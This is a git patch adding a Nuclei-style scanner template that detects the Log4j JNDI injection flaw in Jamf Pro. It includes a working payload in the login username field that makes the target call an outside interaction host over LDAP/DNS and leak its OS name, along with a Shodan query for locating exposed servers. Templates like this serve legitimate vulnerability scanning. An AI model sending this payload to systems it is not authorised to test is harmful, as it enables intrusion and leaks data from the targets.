From cdde4d505381463700ef7aa2d563b689033f6498 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 3 Aug 2022 18:44:10 +0530 Subject: [PATCH] Create jamf-pro-log4j.yaml --- vulnerabilities/other/jamf-pro-log4j.yaml | 50 +++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 vulnerabilities/other/jamf-pro-log4j.yaml diff --git a/vulnerabilities/other/jamf-pro-log4j.yaml b/vulnerabilities/other/jamf-pro-log4j.yaml new file mode 100644 index 0000000000..339700ff64 --- /dev/null +++ b/vulnerabilities/other/jamf-pro-log4j.yaml @@ -0,0 +1,50 @@ +id: jamf-pro-log4j + +info: + name: JamfPro Log4j + author: DhiyaneshDK + severity: critical + reference: + - https://docs.jamf.com/technical-articles/Mitigating_the_Apache_Log4j_2_Vulnerability.html + metadata: + verified: true + shodan-query: title:"Jamf Pro" + tags: rce,jndi,log4j,jamfpro + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Referer: {{BaseURL}} + + username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output